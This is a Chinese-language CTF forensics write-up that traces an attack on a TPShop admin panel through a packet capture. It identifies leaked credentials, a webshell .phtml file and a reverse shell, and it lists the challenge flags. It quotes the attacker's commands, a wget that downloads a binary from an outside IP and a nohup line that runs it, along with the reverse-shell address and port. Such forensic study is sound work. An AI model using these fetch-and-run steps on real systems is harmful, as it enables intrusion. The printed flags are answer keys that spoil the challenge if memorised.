时间:2023-12-25 作者:Sky1ie 分类: CTF
分析流量,需要找到
1、黑客登录后台使用的账号密码
2、黑客获取后台账号密码的文件
3、黑客留下的后门文件的名称
4、黑客提权用到的文件
5、黑客反弹shell的ip与端口
一般后台用户名为admin,考虑到post传参,我们可以直接在流量中搜索
=admin&
所以第一题的flag为 admin/TPShop6.0
这个题misc最后做出来的,不熟悉TPShop6.0的目录结构...找了很久,后面想到可以直接过滤出包含有后台账号密码的流,也就是
tcp matches "admin/TPShop6.0"
所以第二题的flag为 README
在tcp流494中找到
解码后发现是webshell,再往后分析寻找这个phtml文件
cb25ebe8b3d2d53fbba5fbe3c6638f2e.phtml
往后分析发现了这个phtml的利用(在tcp流503中
所以第三题的flag为 cb25ebe8b3d2d53fbba5fbe3c6638f2e.phtml
在tcp流527中发现
所以第四题的flag为 /bin/sh
同样是在tcp流527中,发现执行了“wget http://124.221.70.199:5555/access.log.1”
并执行了“nohup ./access.log.1”
在该流中发现与124.221.70.199:4448建立了连接
所以第五题的flag为 124.221.70.199:4448
如图
flag:DASCTF{2A83E24B603FD54178950E64F23B19F7}
敬请期待~
敬请期待~
标签: Write Up